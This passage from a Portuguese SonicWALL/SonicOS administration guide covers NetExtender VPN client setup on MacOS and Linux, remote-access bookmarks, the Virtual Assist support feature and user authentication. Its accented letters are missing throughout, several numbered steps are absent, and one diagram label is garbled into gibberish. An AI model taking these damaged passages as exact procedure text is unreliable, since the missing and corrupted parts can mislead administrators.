Exibir Informaes de conexo

Voc pode exibir informaes de conexo passando o mouse sobre o cone do NetExtender
na bandeja do sistema.

Instalao do NetExtender em MacOS
O SonicWALL SSL VPN oferece suporte a NetExtender em MacOS. Para usar o NetExtender
em seu sistema MacOS, seu sistema deve atender aos seguintes pr-requisitos:
MacOS 10.4 e posterior
Java 1.4 e superior
Ambos PowerPC e Intel Macs so suportados.
Para instalar o NetExtender em seu sistema MacOS, execute as seguintes tarefas:
Etapa 3 O Virtual Office exibe o status da instalao do NetExtender. Uma janela pop-up pode
aparecer, solicitando que voc aceite um certificado. Clique em Confiar.
Etapa 4 Uma segunda janela pop-up pode aparecer, solicitando que voc aceite um certificado. Clique
em Confiar.

Etapa 5 Quando o NetExtender instalado e conectado com xito, a janela de status do NetExtender
exibida.
Uso do NetExtender em MacOS
Etapa 1 Para iniciar o NetExtender, v para o diretrio Aplicativos em Finder e clique duas vezes em
NetExtender.app.
Etapa 2 A primeira vez que voc se conectar, voc deve inserir o nome de servidor ou Endereo IP no
campo Servidor SSL VPN.
Etapa 4 A primeira vez que voc se conectar, voc deve inserir o nome do domnio.
Etapa 5 Clique em Conectar.
Etapa 6 Voc pode instruir o NetExtender a lembrar seu nome de servidor do perfil no futuro. No menu
suspenso Salvar perfil, voc pode selecionar Salvar nome e senha (se permitido), Salvar
nome de usurio somente (se permitido), ou No salvar perfil.

Etapa 7 Quando o NetExtender conectado, o cone do NetExtender exibido na barra de status na
parte superior direita do seu vdeo. Clique no cone para exibir opes do NetExtender.
Etapa 8 Para exibir um resumo da sua sesso do NetExtender, clique em Status de conexo.
Etapa 9 Para exibir as rotas que o NetExtender instalou, v para o menu do NetExtender e selecione
Rotas.
Etapa 10 Para exibir o Log do NetExtender, v para Janela > Log.

Etapa 11 Para gerar um relatrio de diagnstico com informaes detalhadas sobre o desempenho do
NetExtender, v para Ajuda > Gerar relatrio de diagnstico.
Etapa 12 Clique em Salvar para salvar o relatrio de diagnstico usando o nome de arquivo padro
nxdiag.txt no seu diretrio NetExtender.

Instalao e uso do NetExtender no Linux
O SonicWALL SSL VPN oferece suporte a NetExtender no Linux. Para usar o NetExtender em
seu sistema Linux, seu sistema deve atender aos seguintes pr-requisitos:
Distribuio de Linux compatvel com i386
Linux Fedora Core 3+, Ubuntu 7+ ou OpenSUSE Linux 10.3+
Sun Java 1.4 e superior necessria para usar a GUI do NetExtender.
Nota Mquinas virtuais (VMs) Java Open source no so suportados no momento. Se voc no
tem Sun Java 1.4, voc pode usar a verso da interface da linha de comando do
NetExtender.
Para instalar o NetExtender em seu sistema Linux, execute as seguintes tarefas:
Etapa 2 Clique no boto NetExtender. Uma janela pop-up indica que voc escolheu abrir o arquivo
NetExtender.tgz. Clique em OK para salv-lo em seu diretrio de download padro.
Etapa 3 Para instalar o NetExtender do CLI, navegue at o diretrio onde voc salvou o
NetExtender.tgz e insira o comando tar - zxf NetExtender.tgz.
Etapa 4 Digite o comando cd netExtenderClient.

Etapa 5 Digite . / instalar para instalar o NetExtender.

Etapa 6 Inicie o arquivo NetExtender.tgz e siga as instrues no instalador do NetExtender. O novo
diretrio netExtender contm um atalho para o NetExtender que pode ser arrastado para sua
rea de trabalho barra de ferramentas.
Etapa 7 A primeira vez que voc se conectar, voc deve inserir o nome de servidor ou Endereo IP no
campo Servidor SSL VPN. O NetExtender lembrar o nome do servidor no futuro.

Etapa 9 A primeira vez que voc se conectar, voc deve inserir o nome do domnio. O NetExtender
lembrar o nome de domnio no futuro.

Nota Voc deve estar conectado como raiz para instalar o NetExtender, embora muitos sistemas
Linux permitam que o comando sudo. / instalar seja usado se voc no efetuou logon como
raiz.
Etapa 10 Para exibir as rotas do NetExtender, v para o menu do NetExtender e selecione Rotas.
Etapa 11 Para exibir o Log do NetExtender, v para NetExtender > Log.
Etapa 12 Para gerar um relatrio de diagnstico com informaes detalhadas sobre o desempenho do
NetExtender, v para Ajuda > Gerar relatrio de diagnstico.
Etapa 13 Clique em Salvar para salvar o relatrio de diagnstico usando o nome de arquivo padro
nxdiag.txt no seu diretrio NetExtender.

Configurao de Marcadores SSL VPN
Para obter informaes sobre como configurar marcadores de SSL VPN, consulte Editando
Usurios locais na pgina 986 no captulo Gerenciamento de Usurios.
Etapa 1 Clique em Adicionar Marcador. A janela pop-up Adicionar Marcador ser exibida.
Quando marcadores de usurio so definidos, o usurio ver os marcadores definidos na
pgina inicial do SSL VPN Virtual Office. Membros de usurios individuais no podem excluir
ou modificar marcadores criados pelo administrador.
Etapa 2 Digite um nome descritivo para o marcador no campo Nome do marcador.
Etapa 3 Digite o nome de domnio totalmente qualificado (FQDN) ou o endereo IPv4 de uma mquina
host da LAN no campo Nome ou Endereo IP. Em alguns ambientes, voc pode inserir o nome
de host, como ao criar um marcador VNC em uma rede local do Windows.
Alguns servios podem ser executados em portas no padro e alguns esperam um caminho
ao conectar-se. Dependendo da opo no campo Servio, formate o campo Nome ou
Endereo IP como um dos exemplos mostrados na Tabela 9.
Tabela 9 Nome do marcador ou formatos de Endereo IP por Tipo de servio
Exemplo de campo de Nome ou

Tipo de servio Formato Endereo IP
RDP - ActiveX Endereo IP 10.20.30.4
RDP - Java Porta IP (no padro) 10.20.30.4/6818
FQDN JBJONES-PC.sv.us.sonicwall.com
Nome do host JBJONES-PC
VNC Endereo IP 10.20.30.4
Porta IP (mapeado para sesso) 10.20.30.4:5901 (mapeado para sesso 1)
Observao: No use sesso ou Observao: No use 10.20.30.4:1
nmero do monitor em vez de Dica: Para um marcador em um servidor Linux,
porta. consulte a dica abaixo desta tabela.
Telnet Endereo IP 10.20.30.4
Porta IP (no padro) 10.20.30.4/6818
SSHv1 Endereo IP 10.20.30.4
SSHv2 Porta IP (no padro) 10.20.30.4/6818

Dica Ao criar um marcador Computao de Rede Virtual (VNC)para um servidor Linux, voc
deve especificar o nmero da porta e o nmero de servidor alm do IP do servidor Linux no
campo Nome ou Endereo IP na forma de ipaddress:port:server. Por exemplo, se o
endereo IP do servidor Linux for 192.168.2.2, o nmero da porta 5901, e o nmero do
servidor 1, o valor para o campo Nome ou Endereo IP seria 192.168.2.2:5901:1.
Etapa 4 Para o servio especfico que voc selecionar da lista suspensa Servio , campos adicionais
podem aparecer. Preencha as informaes para o servio selecionado. Selecione um dos
seguintes servios no menu suspenso Servio:
Servios de Terminal (RDP - ActiveX) ou Servios de Terminal (RDP - Java)
Nota Se voc selecionar Servios de Terminal (RDP - ActiveX) enquanto estiver usando um
navegador diferente do Internet Explorer, a seleo alterada automaticamente Servios
de Terminal (RDP - Java). Uma caixa de dilogo pop-up notifica sobre a alterao.
Na lista suspensa Tamanho de tela, selecione o tamanho da tela dos servios de

terminal padro a ser usado quando os usurios executam este marcador.
Como computadores diferentes oferecem suporte a tamanhos de tela diferentes, quando voc
usar um aplicativo de desktop remoto, voc deve selecionar o tamanho da tela no computador
do qual voc est executando uma sesso de rea de trabalho remota. Alm disso, talvez voc
queira fornecer um caminho para o qual o seu aplicativo reside em seu computador remoto,
inserindo o caminho no campo Caminho do Aplicativo.
Na lista suspensa Cores, selecione a intensidade de cores padro para a tela do
servio de terminal quando os usurios executam este marcador.
Opcionalmente, digite o caminho local para este aplicativo no campo Aplicativo e
Caminho (opcional).
No campo Iniciar na seguinte pasta, opcionalmente, insira a pasta local na qual
executar comandos do aplicativo.
Selecione a caixa de seleo Efetuar Login como sesso de console/admin para
permitir o login como console ou Admin.
Para RDP - Java em clientes Windows ou em clientes Mac executando o Mac OS X
10.5 ou superior com RDC instalado, expanda Exibir opes avanadas do Windows
e selecione as caixas de seleo para qualquer uma das seguintes opes de
redirecionamento: Redirecionar impressoras, Redirecionar unidades,
Redirecionar Portas, Redirecionar SmartCards, Redirecionar rea de transferncia
ou Redirecionar dispositivos Plug and Play para redirecionar os dispositivos ou
recursos na rede local para uso nesta sesso do marcador. Voc pode passar o
ponteiro do seu mouse sobre o cone da Ajuda ao lado de determinadas opes
para exibir dicas de ferramentas que indicam requisitos.
Para ver as impressoras locais aparecem em seu computador remoto (Iniciar >
Configuraes > Painel de controle > impressoras e Faxes), selecione Redirecionar
Portas e Redirecionar impressoras.
Selecione as caixas de seleo para qualquer um dos seguintes recursos adicionais

para uso nesta sesso do marcador: Exibir barra de conexo, Reconexo
automtica, Plano de fundo da rea de trabalho, Arrastar janela, Animao de

menu/janela, Temas, ou Cache de bitmaps.
Se o aplicativo cliente for RDP 6 (Java), voc pode selecionar qualquer uma das
opes a seguir tambm: Monitores duplos, suavizao de fonte, composio da
rea de trabalho, ou Aplicativo remoto.
Aplicativo remoto monitora servidores e atividade de conexo do cliente; para us-lo,
voc precisa se registrar aplicativos remotos na lista de aplicativos Windows 2008. Se
Aplicativo remoto for selecionado, o Console de Java exibir mensagens relativas a
conectividade com o Servidor de Terminal.
Para RDP - ActiveX em clientes Windows, opcionalmente, selecione Habilitar plugin
DLLs e insira o nome do cliente DLLs que precisa ser acessado pelo servio de
terminal ou rea de trabalho remoto. Vrias entradas so separadas por uma vrgula,
sem espaos. Observe que o cliente RDP Java no Windows um cliente RDP nativo
que oferece suporte a plugin DLLs por padro. A opo Habilitar plugin DLLs no
est disponvel para RDP - Java. Consulte Habilitar Plugin DLLs na pgina 930.
Alternativamente, selecione Efetuar login automaticamente e selecione Usar
credenciais de conta SSL VPN para encaminhar as credenciais da sesso SSL VPN
atual para login no servidor de RDP. Selecione Usar credenciais personalizadas para
inserir um nome de usurio personalizado, senha e domnio para este marcador. Para
obter mais informaes sobre credenciais personalizadas, consulte Criao de
Marcadores com credenciais SSO Personalizadas na pgina 930.
Virtual Network Computing (VNC)

No h campos adicionais
Telnet
Secure Shell verso 1 (SSHv1)

Secure Shell verso 2 (SSHv2)

Alternativamente, selecione a caixa de seleo Aceitar automaticamente chave de
host.
Se usar um servidor SSHv2 sem autenticao, como um firewall SonicWALL, voc
poder selecionar a caixa de seleo Ignorar nome de usurio.
Etapa 5 Clique em Adicionar para atualizar a configurao.

Habilitar Plugin DLLs
O recurso de plugin DLLs est disponvel para RDP (ActiveX ou Java) e permite o uso de
determinados programas de terceiros, como unidades de impresso, em uma mquina remota.
Este recurso requer a verso do controle de Cliente RDP 5 ou superior.
Nota O cliente RDP Java no Windows um cliente RDP nativo que oferece suporte a plugin DLLs
por padro. Nenhuma ao (ou caixa de seleo) necessria.
Habilitar plugin DLLs para o cliente RDP ActiveX:
Etapa 1 Navegue at Usurios > Usurios locais.

Etapa 2 Clique no cone Configurar correspondente ao marcador do usurio que voc deseja editar.
Etapa 3 Na guia Marcadores, clique em Adicionar marcador.
Etapa 4 Selecione Servios de Terminal (RDP - ActiveX) como Servio e configure conforme descrito
na seo Configurao de Marcadores SSL VPN na pgina 927.
Etapa 5 Insira o nome do cliente DLLs que precisa ser acessado pelo servio de terminal ou rea de
trabalho remota. Vrias entradas so separadas por uma vrgula, sem espaos.
Etapa 6 Certifique-se de que qualquer DLLs necessria est localizada nos sistemas clientes
individuais em %SYSTEMROOT% (por exemplo: C:\Windows\System32).
Nota Certifique-se de que seu sistema Windows e o cliente RDP esto atualizados antes de usar
o recurso de plugin DLLs . Este recurso requer o Controle de Cliente do RDP 5 ou superior.
Criao de Marcadores com credenciais SSO Personalizadas

O administrador pode configurar credenciais Single Sign On (SSO) personalizadas para cada
usurio, grupo ou globalmente em marcadores RDP. Esse recurso usado para acessar os
recursos que precisam de um prefixo de domnio para autenticao SSO. Os usurios podem
efetuar login no SonicWALL SSL VPN como nome de usurio, e clique em um marcador
personalizado para acessar um servidor com dominio\nomedeusuario.. Parmetros
diretamente textuais ou variveis podem ser usados para as credenciais de login.
Para configurar credenciais SSO personalizadas, execute as seguintes etapas:
Etapa 1 Crie ou edite um marcador RDP conforme descrito em Configurao de Marcadores SSL VPN
na pgina 927.
Etapa 2 Na guia Marcadores, selecione a opo Usar Credenciais Personalizadas.
Etapa 3 Insira o nome de usurio apropriado e a senha ou use variveis dinmicas da seguinte
maneira:
Uso de Texto Varivel Exemplo de uso

Nome de login %USERNAME% US\%USERNAME%
Nome de domnio %USERDOMAIN% %USERDOMAIN\%USERNAME%
Nome do grupo %USERGROUP% %USERGROUP%\%USERNAME%

Uso de Marcadores SSL VPN
As sees a seguir descrevem como usar os vrios tipos de marcadores:
Uso de Marcadores de rea de trabalho remotas na pgina 931
Uso de Marcadores VNC na pgina 933
Uso de marcadores Telnet na pgina 935
Uso de marcadores SSHv1 na pgina 936
Uso de Marcadores SSHv2 na pgina 937
Uso de Marcadores de rea de trabalho remotas

Marcadores Protocolo de rea de trabalho remota (RDP) permitem que voc estabelea
conexes remotas com uma rea de trabalho especificada. O SonicWALL SSL VPN suporta o
padro de RDP5 com clientes Java e ActiveX. O RDP5 ActiveX s pode ser usado atravs do
Internet Explorer, enquanto o RDP5 Java pode ser executada em qualquer plataforma e
navegador suportado pelo SSL VPN. A funcionalidade bsica de dois clientes o mesma; mo
entanto, o cliente Java um cliente RDP nativo e suporta os seguintes recursos que o cliente
ActiveX no suporta:
Redirecionar rea de transferncia
Redirecionar dispositivos Plug and Play
Exibir barra de conexo
Reconexo automtica
Plano de fundo do desktop
Arraste de janela
Animao de menu/janela
Temas
Cache de bitmaps
Se o aplicativo de cliente Java for RDP 6, ele tambm oferece suporte:
Monitores duplos
Suavizao de fonte
Composio do desktop
Nota Os marcadores RDP podem usar uma designao de porta se o servio no estiver em
execuo na porta padro.
Dica Para encerrar sua sesso na rea de trabalho remota, no se esquea de fazer logoff da
sesso de Servidor de Terminal. Se desejar suspender a sesso de Servidor de Terminal
(para que ele possa ser retomado mais tarde) voc pode simplesmente fechar a janela de
rea de trabalho remota.

Etapa 1 Clique na guia RDP. Continue por quaisquer telas de aviso que so exibidas clicando em Sim
ou OK.
Etapa 2 Insira seu nome de usurio e senha na tela de login e selecione o nome de domnio correto no
menu suspenso.
Etapa 3 Uma janela exibida indicando que o Cliente de rea de trabalho remota est sendo
carregado. rea de trabalho remota carrega na sua prpria janela. Agora voc pode acessar
todos os aplicativos e arquivos no computador remoto.

Uso de Marcadores VNC
Etapa 1 Clique no marcador VNC. A seguinte janela exibida enquanto o cliente VNC carregado.
Nota VNC pode ter uma designao de porta se o servio est sendo executado em uma porta
diferente.
Etapa 2 Quando o cliente VNC foi carregado, voc ser solicitado a inserir sua senha na janela VNC
Autenticao.
Etapa 3 Para configurar opes de VNC, clique no boto Opes. A janela Opes exibida.

A tabela a seguir descreve as opes que podem ser configuradas para VNC.
Opo Padro Descrio de Opes

Codificao: Rgida Hextile uma boa opo para redes rpidas, enquanto Rgida
mais adequada para conexes de baixa largura de banda. Do outro
lado, o decodificador Rgido no Visualizador TightVNC Java mais
eficiente que o decodificador Hextile , por isso esta configurao
padro tambm pode ser aceitvel para redes rpidas.
Nvel de compresso Padro Use o nvel de compactao especificado para as codificaes
Rgida e Zlib. O nvel 1 usa o mnimo de tempo da CPU no servidor,
mas obtm a taxa de compactao fraca. O nvel 9 oferece melhor
compactao, mas pode ser lento em termos de consumo de tempo
da CPU no lado do servidor. Uso altos nveis com conexes de rede
muito lentas e nveis baixos ao trabalhar em redes de alta
velocidade. O valor Padro significa que o nvel de compactao
padro do servidor deve ser usada.
Qualidade de imagem 6 Isso no pode ser modificado.
JPEG
Atualizaes da forma do Habilitar Atualizaes da forma do cursor uma extenso do protocolo usada
cursor: para tratar movimentos do cursor remotos localmente no lado do
cliente, economizando largura de banda e eliminando atrasos na
movimentao do ponteiro do mouse. Observe que as atualizao
de implementao da forma do cursor no permite que um cliente
rastreie a posio do cursor do mouse no lado do servidor. Isso
significa que os clientes no veriam movimentos do cursor do mouse
se o mouse foi movido localmente no servidor ou por um outro
cliente VNC remoto.
Defina esse parmetro como Desabilitar se voc deseja sempre
deseja consultar posio real do cursor no lado remoto. Definir essa
opo como Ignorar semelhante a Habilitar mas o cursor remoto
no ficaro visvel de forma alguma. Isso pode ser uma definio
razovel se voc no se importa com forma do cursor e no deseja
ver dois cursores de mouse, um em cima do outro.
Usar CopyRect Sim CopyRect economiza largura de banda e tempo quando partes da
tela remota esto se movendo. Provavelmente, voc no deseja
alterar essa definio.
Cores restritas No Se definido como No, ento, o formato de cor de 24 bits usado
para representar dados de pixel. Se definido como Sim, ento,
somente 8 bits so usados para representar cada pixel. O formato de
cor de 8 bits pode economizar largura de banda, mas as cores
podem parecer muito imprecisas.
Botes 2 e 3 do mouse Normal Se definido como Invertido, o boto direito do mouse (boto 2)
atuar como se fosse o boto do meio do mouse (boto 3) e vice-
versa.
Somente exibir No Se definido como Sim, ento, todos os eventos de teclado e mouse
na janela de rea de trabalho sero ignorados silenciosamente e no
sero passados para o lado remoto.
Compartilhar rea de Sim Se definido como Sim, ento, a rea de trabalho pode ser
trabalho compartilhada entre clientes. Se esta opo estiver definida como
No, ento, uma sesso de usurio existente terminar quando um
novo usurio acessar a rea de trabalho.

Uso de marcadores Telnet
Etapa 1 Clique no marcador Telnet.
Nota Os marcadores Telnet podem usar uma designao de porta para servidores que no
estejam executando na porta padro.
Etapa 2 Clique em OK para qualquer mensagem de aviso que for exibida. Inicia uma janela Telnet com
base em Java.
Etapa 3 Se o dispositivo ao qual voc est realizando uma sesso de Telnet est configurado para
autenticao, insira seu nome de usurio e senha.

Uso de marcadores SSHv1
Nota Os marcadores SSH podem usar uma designao de porta para servidores que no
Etapa 1 Clique no marcador SSHv1. Uma janela com base em Java SSH iniciada.

Etapa 3 Uma sesso SSH iniciada no applet Java.
Dica Algumas verses do JRE podem fazer com que a janela de autenticao SSH aparea por
trs da janela SSH.

Uso de Marcadores SSHv2
Nota Os marcadores SSH podem usar uma designao de porta para servidores que no
Etapa 1 Clique no marcador SSHv2. Uma janela com base em Java SSH exibida. Digite seu nome de
usurio no campoNome de usurio e clique em Login.
Etapa 2 Uma chave de host pop-up exibida. Clique em Sim para aceitar e continuar com o processo
de login.

Etapa 3 Insira sua senha e clique em OK.
Etapa 4 O terminal SSH iniciado em uma nova tela.
Definindo as configuraes do perfil do dispositivo para o IPv6

O SonicOS suporta conexes do NetExtender para usurios com endereos IPv6.
Na pgina SSLVPN > Configuraes de clientes, primeiro configure o pool
tradicional de endereo IP do IPv6 e depois configure um Pool de IP do IPv6. Dois
endereos internos sero atribudos aos clientes: um do IPv4 e um do IPv6.
Nota Servidores DNS/Wins do IPv6 no so suportados.
Na pgina SSLVPN > Rotas de clientes, o usurio pode selecionar uma rota de cliente na lista
suspensa de todos os objetos de endereo, incluindo todos os objetos de endereo IPv6
predefinidos.
Nota O FQDN do IPv6 suportado.

Parte 15
Virtual Assist
| 939
Captulo 58
Configurando o Virtual Assist
Virtual Assist
Viso geral do Virtual Assist na pgina 941
Virtual Assist > Status na pgina 941
Virtual Assist > Configuraes na pgina 942
Usando o Virtual Assist na pgina 945
Viso geral do Virtual Assist

O Virtual Assist permite que os usurios ofeream suporte a problemas tcnicos do cliente sem
precisarem estar no local com o cliente. Esse recurso atua como uma enorme economia de
tempo para equipe de suporte, ao adicionar flexibilidade em como possvel responder s
necessidades de suporte. Os usurios podem permitir ou convidar clientes a associarem-se a
uma "fila" para receber suporte e, em seguida, auxiliar virtualmente cada cliente, assumindo o
controle remotamente do computador de um cliente para diagnosticar e corrigir problemas
tcnicos.
Virtual Assist > Status

O Virtual Assist permite que os clientes efetuem login para receber suporte tcnico,
adicionando seus nomes a uma fila. O status dos clientes que aguardam suporte por meio do
Virtual Assist pode ser exibido na interface de gerenciamento do SonicOS na tela Virtual
Assist > Status.
Configurando o Virtual Assist | 941

O status de cada cliente inclui se o cliente est recebendo suporte do Virtual Assist atualmente
ou sua posio na fila para receber o suporte. A tela de status tambm pode fornecer um
resumo do problema de cada cliente e o nome do tcnico atribudo. O tcnico ou o
administrador que fornece o Virtual Assist deve estar localizado dentro da rede local do
dispositivo. Um cliente pode ser removido manualmente da fila, clicando no cone "Efetuar
logout" no lado direito da listagem do cliente.
Virtual Assist > Configuraes

Os usurios que desejam maximizar a flexibilidade do recurso Virtual Assist devem levar um
tempo para ajustar adequadamente todas as configuraes disponveis. Para definir as
configuraes na interface de gerenciamento do SonicOS, v tela Virtual Assist >
Configuraes.
A primeira deciso que deve ser tomada como fornecer acesso aos clientes para obter
suporte por meio do Virtual Assist. H duas opes: 1) fornecer um "cdigo de assistncia"
para os clientes inserirem ao acessarem o portal aps receber um convite, ou, 2) ativar o
suporte do Virtual Assist sem a necessidade de um convite.
Definindo um cdigo de assistncia global para clientes, possvel restringir quem entra no
sistema para solicitar ajuda. O cdigo pode ter no mximo oito (8) caracteres e pode ser
inserido no campo Cdigo de assistncia. Os clientes recebem o cdigo por meio de um e-mail
fornecido pelo administrador ou tcnico. Para permitir que os clientes solicitem o suporte do
Virtual Assist sem a necessidade de fornecer um cdigo, deixe o campo Cdigo de assistncia
em branco e marque a caixa de seleo "Habilitar suporte sem convite".
O campo "Aviso de iseno de responsabilidade" permite que os administradores definam uma

mensagem escrita que os clientes devem ler e concordar antes de receber suporte. Se um
aviso de iseno de responsabilidade for definido, ele dever ser aceito por cada cliente, antes
que eles possam entrar na fila do Virtual Assist.
O campo "Link de acesso de cliente" permite que os usurios definam uma URL para o acesso
de cliente ao dispositivo SSL-VPN, de fora da rede. Se nenhuma URL for inserida, o convite
de suporte aos clientes usar a mesma URL que o tcnico usa para acessar o dispositivo.

Nota Essa URL dever ser configurada, se o dispositivo SSL-VPN for acessado por meio de uma
URL diferente de fora da rede.
Se os clientes navegarem at a pgina de login do tcnico, voc ter a opo de exibir um link
para redirecion-los pgina de login de suporte. Para fazer isso, habilite a caixa de seleo
"Exibir o link do Virtual Assist a partir do login do portal". O suporte sem convite dever ser
habilitado, se desejar que os clientes possam solicitar ajuda a partir da pgina de login.
Na seo de tela "Configuraes de notificao", possvel personalizar vrios aspectos das

configuraes de notificao de convite e do tcnico. Todas as entradas de endereo de e-mail
no campo "Lista de e-mails do tcnico" recebero um e-mail de notificao quando um cliente
entrar na fila de suporte (no convidado). Pode ser adicionado no mximo 10 e-mails nesta
lista, cada um separado por um ponto e vrgula.
Os usurios podem personalizar a linha de assunto de e-mails de convite de suporte inserindo
o texto desejado no campo "Assunto do convite". As seguintes variveis podem ser usadas no
campo "Assunto do convite":
Nome do tcnico: %EXPERTNAME%
Mensagem do cliente no convite: %CUSTOMERMSG%
Link para suporte: %SUPPORTLINK%
Link para o SSL-VPN: %ACCESSLINK%
Essas variveis tambm podem ser usadas no campo "Mensagem de convite", em que os
usurios podem personalizar ainda mais o corpo do e-mail de convite, inserindo o texto
desejado. A mensagem pode ter um comprimento mximo de 800 caracteres.

Para utilizar os recursos de convite de e-mail do Virtual Assist, deve-se configurar as
definies apropriadas do Servidor de correio e do Correio de endereo na tela Log >
Automao na interface de gerenciamento do SonicOS:
Na seo da tela "Configuraes de solicitao", na tela Virtual Assist > Configuraes,

possvel configurar vrias definies relacionadas aos limites de solicitao de suporte. O
campo "Mximo de solicitaes" permite limitar o nmero de clientes que pode ficar
aguardando assistncia na fila ao mesmo tempo.
O campo "Limite de Mensagens" permite inserir o texto a ser exibido como uma mensagem
aos clientes, quando no houver pontos disponveis no momento na fila, visto que o limite
mximo de solicitaes foi atingido.
Tambm possvel limitar o nmero de solicitaes provenientes de um nico IP. Isso impede
que o mesmo cliente solicite suporte ao Virtual Assist vrias vezes ao mesmo tempo. Insira o
limite de quantidade desejada no campo "Mximo de solicitaes de um IP". Insira 0 para
nenhuma limitao.
Para evitar que os clientes aguardem indefinidamente o suporte do Virtual Assist durante os
perodos de alto volume, possvel definir um limite de tempo (em minutos) para quanto tempo
um cliente pode permanecer na fila sem receber suporte. Defina esse limite, inserindo o
nmero desejado de minutos no campo "Solicitao pendente expirada". Insira "0", se no
desejar definir um limite.
Se voc encontrar solicitaes de origens indesejadas ou ilegtimas, poder bloquear as

solicitaes de endereos IP definidos. Isso pode ser feito na seo da tela "Configuraes de
restrio".

Clique no boto "Adicionar" para adicionar um endereo IP de origem a ser bloqueado. Uma
nova janela ser exibida.
Insira o "Tipo de endereo de origem" e o "Endereo IP" do qual deseja negar solicitaes de
suporte. Clique em OK para enviar as informaes. Agora, o endereo recentemente
bloqueado ser exibido na seo da tela "Negar solicitao do endereo definido ".
Depois de preenchido todos os ajustes necessrios para a tela Virtual Assist >
Configuraes, clique no boto "Aceitar" para bloquear as configuraes. Clique em
"Cancelar" para reverter para as configuraes mais recentes.
Usando o Virtual Assist

Download e instalao do Virtual Assist Stand Alone Client (VASAC)

Para usar o Virtual Assist, o tcnico e o cliente devem baixar o Virtual Assist Stand Alone Client
(VASAC) na pgina do portal. Na pgina do portal, o tcnico pode preencher todos os
parmetros de login necessrios, baixar o instalador do cliente, clicando no boto "Virtual
Assist". possvel clicar duas vezes no instalador transferido por download para efetuar login
automaticamente do firewall.
O cliente poder baixar e instalar o VASAC a partir da pgina de login de cliente, se a opo
"Habilitar suporte sem convite", tiver sido habilitada anteriormente pelo administrador.
Se a opo estiver desabilitada, os clientes devero clicar no link fornecido do e-mail de

convite enviado pelo tcnico, para baixar e iniciar o VASAC.
Conexo e login do Virtual Assist

Se a configurao "Habilitar suporte sem convite" estiver habilitada e os clientes tiverem
instalado o VASAC, eles podero continuar com o login do Virtual Assist. O cliente deve
selecionar o cone de "Cliente" esquerda do painel e preencher os campos de informaes
necessrias.
O cliente poder, em seguida, clicar no boto "Efetuar login" para entrar na fila de espera do
Virtual Assist.
Depois que o tcnico tiver instalado o VASAC, os clientes podero continuar para efetuar login
no Virtual Assist. O tcnico seleciona a guia "Tcnico", preenche os parmetros de login
necessrios e clica no boto "Efetuar login".

O painel principal, em seguida, ser exibido ao tcnico. Neste painel, o tcnico pode clicar
duas vezes em "Iniciar" no menu pop-up para iniciar o tnel de suporte com o cliente.
Depois que o tnel for estabelecido, o tcnico poder exibir e controlar a rea de trabalho do
cliente, o bate-papo com o cliente e a transferncia de arquivos, se necessrio. O controle
pode ser encerrado a qualquer momento encerrando o aplicativo de suporte.

Parte 16
Gerenciamento de
usurio
| 949
Captulo 59
Gerenciando configuraes de usurios
e de autenticao
Gerenciamento de usurios
Esta seo descreve os recursos de gerenciamento de usurios do dispositivo de segurana
de rede Dell SonicWALL para os usurios autenticados localmente e remotamente. Esta seo
Introduo ao Gerenciamento de usurios na pgina 951
Exibindo o status em Usurios > Status na pgina 973
Definindo as configuraes em Usurios > Configuraes na pgina 973
Configurando os Usurios locais na pgina 983
Configurando Grupos locais na pgina 988
Configurando a autenticao RADIUS na pgina 993
Configurando a integrao do LDAP no SonicOS na pgina 999
Configurandoo Login nico na pgina 1013
Configurando o Suporte para mltiplos administradores na pgina 1068
Introduo ao Gerenciamento de usurios

Usando Grupos e usurios locais para a autenticao na pgina 952
Usando o RADIUS para a autenticao na pgina 954
Usando a autenticao LDAP/Active Directory/eDirectory na pgina 955
Viso geral do Login nico (SSO) na pgina 957
Viso geral do Suporte para mltiplos administradores na pgina 969
Os dispositivos de segurana de rede Dell SonicWALL oferecem um mecanismo para

autenticao no nvel do usurio que fornece aos usurios o acesso LAN de locais remotos
na Internet, bem como um meio para impor ou ignorar polticas de filtragem de contedo para
usurios da LAN que tentam acessar a Internet. Tambm possvel permitir somente aos
usurios autenticados o acesso aos tneis de VPN e o envio de dados pela conexo
criptografada. O firewall autentica todos os usurios no momento em que tentam acessar os
Gerenciando configuraes de usurios e de autenticao | 951

recursos da rede em uma zona diferente (como WAN, VPN, WLAN, etc.), que faz com que o
trfego da rede passe pelo firewall. Os usurios que efetuam login em um computador na LAN,
mas que realizam somente tarefas locais no so autenticados pelo firewall. A autenticao no
nvel do usurio pode ser realizada com o uso de um banco de dados local de usurios, LDAP,
RADIUS ou uma combinao de um banco de dados local com o LDAP ou o RADIUS. O
SonicOS tambm oferece o recurso de Login nico (SSO). O SSO pode ser utilizado em
conjunto com o LDAP. O banco de dados local do firewall pode suportar at 1.000 usurios. Se
voc tiver mais de mil usurios, use o RADIUS ou LDAP para a autenticao.
!DMINISTRATOR

#ONFIGURE #ONFIGURE%XTERNAL
,OCAL$ATABASE $ATABASE2!$)53,$!0

#ONFIGURE3ONIC7!,, #ONFIGURE2!$)53
#ONFIGURE,$!0

,OCAL5SERS #ONFIGURE'ROUPS
ON3ONIC7!,,

5SER'ROUPS
Usando Grupos e usurios locais para a autenticao

O dispositivo de segurana de rede Dell SonicWALL fornece um banco de dados local para
armazenar informaes de grupos e usurios. possvel configurar o firewall para usar este
banco de dados local para autenticar usurios e controlar o acesso rede. O banco de dados
local uma boa opo comparado ao RADIUS ou o LDAP para essa finalidade, quando o
nmero de usurios que acessam a rede for relativamente pequeno. Criar entradas para

dezenas de usurios e grupos um processo demorado, mesmo que depois de serem criadas
elas no sejam difceis de manter. Para as redes com um nmero maior de usurios, a
autenticao de usurios com o uso dos servidores LDAP ou RADIUS pode ser mais eficiente.
Internet
1 3 2 Network Security Appliance E7500
User
Workstation
1 User attempts to access the web.
2 SNWL requires authentication of the User:

redirects workstation to authenticate.
3 User authenticates with credentials.
4 SNWL Local Database authorizes or denies access based on User privileges.
Para aplicar polticas do Content Filtering Service (CFS) aos usurios, os usurios devem ser
membros de grupos locais para que as polticas do CFS sejam aplicadas aos grupos. Para usar
o CFS, o RADIUS ou o LDAP no podem ser utilizados sem a combinao desse mtodo com
a autenticao local. Ao usar o mtodo de autenticao combinada para usar as polticas do
CFS, os nomes dos grupos locais devem ter uma correspondncia exata com os nomes dos
grupos no LDAP ou RADIUS. Ao usar o mtodo de autenticao LDAP + Usurios locais,
possvel importar os grupos do servidor do LDAP para o banco de dados local do firewall. Isso
simplifica de forma substancial a criao de grupos correspondentes, para os quais as polticas
do CFS podem ento ser aplicadas.
A interface do usurio do SonicOS oferece uma maneira de criar contas de grupos e usurios
locais. possvel adicionar usurios e editar a configurao para qualquer usurio, incluindo
